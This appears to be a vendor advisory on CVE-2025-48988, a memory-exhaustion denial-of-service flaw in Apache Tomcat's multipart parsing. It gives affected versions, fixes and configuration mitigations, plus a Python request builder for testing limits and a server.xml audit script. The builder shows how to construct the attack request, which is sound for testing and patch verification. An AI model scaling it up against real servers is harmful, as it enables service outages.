Overview
Apache Tomcat is an open-source web server and servlet container developed by the Apache Software Foundation. It implements several Java EE and, from Tomcat 10 onward, Jakarta EE specifications, including Servlet, Server Pages (JSP), and WebSocket, which allows it to run Java web applications. Tomcat is widely used in development and production environments because it is lightweight, easy to configure, and compatible with a wide range of Java applications.
A Denial of Service (DoS) vulnerability, CVE-2025-48988, has been identified in Apache Tomcat's handling of multipart/form-data requests. It allows a remote attacker to exhaust server memory on any deployment whose application parses multipart requests.
The Open Web Application Security Project (OWASP) explains that Denial of Service (DoS) attacks are focused on making a resource (site, application, server) unavailable for the purpose it was designed. There are many ways to make a service unavailable for legitimate users, by manipulating network packets or by exploiting programming, logic, or resource-handling vulnerabilities, among others. If a service receives a very large number of requests, it may cease to be available to legitimate users. In the same way, a service may stop if a programming vulnerability, or a flaw in the way the service handles the resources it uses, is exploited.
This issue affects Apache Tomcat 9.0.0.M1 through 9.0.105, 10.1.0-M1 through 10.1.41, and 11.0.0-M1 through 11.0.7, as well as the end-of-life 8.5.x branch.
Details
Module Info
- Product: Apache Tomcat
- Affected packages: tomcat-embed-core (org.apache.tomcat.embed), tomcat-catalina (org.apache.tomcat)
- Affected versions: >=9.0.0.M1 <9.0.106, >=10.1.0-M1 <10.1.42, >=11.0.0-M1 <11.0.8
- GitHub repository: https://github.com/apache/tomcat
- Published packages:
  - Package manager: Maven
- Fixed in: 9.0.106, 10.1.42, and 11.0.8 (Apache Tomcat releases); 8.5.101 (HeroDevs NES release for the end-of-life 8.5.x branch)
Vulnerability Info
An attacker can exploit a vulnerable version of Tomcat by sending a multipart/form-data request that contains a very large number of parts. Tomcat must retain each part's headers in memory while it processes the request, and before the fix it imposed no dedicated limit on either the number of parts or the size of each part's headers, so a single request can consume far more memory than its body size suggests. A few such requests, or one large one, can exhaust the heap and render the server unresponsive.
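The following is an added example, not code from this advisory or from the Tomcat project, that builds the class of request described above at a small scale so you can check limit enforcement on a test instance you operate: each part carries its own headers, and an optional padding header lets you exercise the per-part header limit as well as the part-count limit. The host, port, and path passed to probe() are assumptions; point it only at an endpoint that actually reads parts, because Tomcat parses the multipart body lazily when the application calls getParts() or getParameter().

```python
"""Shape of the request class behind CVE-2025-48988: a multipart/form-data body
with many parts, each carrying headers the server must retain while parsing.
Added example for checking limit enforcement on a test instance you operate;
not code from the advisory or from the Tomcat project.  Host, port and path in
probe() and in the __main__ block are assumptions."""
import http.client
import secrets


def build_multipart(part_count, header_padding=0, field_value=b"x"):
    """Return (body, boundary) for a form with part_count text fields.

    Every part gets its own Content-Disposition header; header_padding adds
    an extra X-Pad header of that many bytes to each part so that a server's
    per-part header limit (maxPartHeaderSize on a patched Tomcat) can be
    exercised as well as the part-count limit (maxPartCount)."""
    boundary = "----probe" + secrets.token_hex(8)
    chunks = []
    for i in range(part_count):
        headers = [f'Content-Disposition: form-data; name="f{i}"']
        if header_padding:
            headers.append("X-Pad: " + "a" * header_padding)
        chunks.append(
            f"--{boundary}\r\n".encode()
            + "\r\n".join(headers).encode()
            + b"\r\n\r\n"
            + field_value
            + b"\r\n"
        )
    chunks.append(f"--{boundary}--\r\n".encode())
    return b"".join(chunks), boundary


def count_parts(body, boundary):
    """Number of parts in body: one opening delimiter per part.  The closing
    delimiter (--boundary--) does not match because of the trailing CRLF."""
    return body.count(f"--{boundary}\r\n".encode())


def retained_header_bytes(body, boundary):
    """Bytes of part headers the server has to keep for this request, which is
    the quantity the vulnerable versions never bounded.  This parses the body
    we built, so it is a pre-flight estimate, not a server-side measurement."""
    total = 0
    for part in body.split(f"--{boundary}\r\n".encode())[1:]:
        header_block, _, _ = part.partition(b"\r\n\r\n")
        total += len(header_block)
    return total


def probe(host, port, path, part_count, header_padding=0, timeout=10):
    """POST the constructed body and return the HTTP status code."""
    body, boundary = build_multipart(part_count, header_padding)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request(
        "POST",
        path,
        body=body,
        headers={
            "Content-Type": f"multipart/form-data; boundary={boundary}",
            "Content-Length": str(len(body)),
        },
    )
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


if __name__ == "__main__":
    # Assumed target: a local test instance with an endpoint that reads parts.
    # 11 parts exceeds the default maxPartCount of 10 on a patched Tomcat;
    # 600 bytes of padding exceeds the default maxPartHeaderSize of 512.
    for parts, pad in ((11, 0), (1, 600)):
        print(parts, pad, probe("127.0.0.1", 8080, "/upload", parts, pad))
```

Compare the status returned for a request just under each default limit with one just over it; a patched Tomcat with default Connector settings should stop treating the over-limit request as a normal form submission, while an unpatched one accepts both. Keep the part counts small: the point is to confirm that limits are enforced, not to reproduce the memory exhaustion.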
Mitigation
Only the 9.0.x, 10.1.x, and 11.0.x branches of Apache Tomcat are community-supported. Apache Tomcat 8.5.x reached end of life on 31 March 2024 and will not receive a community update for this issue. For more information, see the Tomcat project's end-of-life announcement for 8.5.x.
Users of the affected components should apply one of the following mitigations:
- Upgrade to a patched version of Apache Tomcat (9.0.106, 10.1.42, or 11.0.8) and review maxPartCount (default 10 parts) and maxPartHeaderSize (default 512 bytes) on each Connector in server.xml. Both attributes exist only in patched builds; an unpatched Tomcat ignores them and logs a "did not find a matching property" warning at startup, so setting them is not a substitute for upgrading. Raise the defaults only for applications that genuinely need more parts, and bound the total multipart body with maxRequestSize in the application's MultipartConfig as defense in depth.
- Leverage a commercial support partner like HeroDevs for post-EOL security support; NES 8.5.101 includes the fix for the 8.5.x branch.
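To make the Connector review above repeatable, here is an added example (not code from this advisory or from the Tomcat project) that audits a server.xml for the two limits and flags Connectors where either has been switched off. The embedded server.xml is constructed for the example; the default values are the ones this advisory quotes for the first fixed releases, and the treatment of negative values as "unlimited" is an assumption to confirm against the Connector reference for the release you run.

```python
"""Audit Tomcat server.xml Connectors for the multipart limits that ship with
the CVE-2025-48988 fix (maxPartCount, maxPartHeaderSize).  Added example, not
code from the advisory or from the Tomcat project; the embedded server.xml is
constructed for this example."""
import xml.etree.ElementTree as ET

# Defaults applied when the attribute is absent on 9.0.106 / 10.1.42 / 11.0.8;
# confirm against the Connector reference for the release you deploy.
DEFAULTS = {"maxPartCount": 10, "maxPartHeaderSize": 512}

# Constructed sample: one Connector on defaults, one with the limits switched
# off, one with tighter explicit limits.
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <!-- relies on the built-in defaults -->
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <!-- limits switched off by an administrator -->
    <Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
               SSLEnabled="true" maxPartCount="-1" maxPartHeaderSize="-1"/>
    <!-- explicit, tighter limits for an API that takes a single upload -->
    <Connector port="8081" protocol="HTTP/1.1"
               maxPartCount="2" maxPartHeaderSize="256"/>
  </Service>
</Server>
"""


def audit_connectors(server_xml):
    """Return one (port, attribute, value, status) finding per Connector and limit.

    status is one of:
      default   - attribute absent; Tomcat's default applies on a patched build
      ok        - explicit value at or below the default
      loosened  - explicit value above the default (needs a justification)
      unlimited - negative value; assumption: negative disables the limit
      invalid   - not an integer; treat as a misconfiguration
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        port = conn.get("port", "?")
        for attr, default in DEFAULTS.items():
            raw = conn.get(attr)
            if raw is None:
                findings.append((port, attr, default, "default"))
                continue
            try:
                value = int(raw)
            except ValueError:
                findings.append((port, attr, raw, "invalid"))
                continue
            if value < 0:
                status = "unlimited"
            elif value <= default:
                status = "ok"
            else:
                status = "loosened"
            findings.append((port, attr, value, status))
    return findings


def weak_connectors(findings):
    """Ports whose Connector has at least one disabled or invalid limit."""
    return sorted({port for port, _, _, status in findings
                   if status in ("unlimited", "invalid")})


if __name__ == "__main__":
    results = audit_connectors(SAMPLE_SERVER_XML)
    for port, attr, value, status in results:
        print(f"port {port:>5}  {attr:<17} {value!s:>6}  {status}")
    print("needs attention:", weak_connectors(results))
```

Run it against your real server.xml by reading the file into audit_connectors(). A "default" finding is only acceptable once the running build is one of the fixed releases, because an unpatched Tomcat has no such limit to fall back on; a "loosened" finding is not automatically wrong, but the raised value should be tied to a known form layout rather than left open-ended.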
Credit
- TERASOLUNA Framework Security Team of NTT DATA Group Corporation (finder)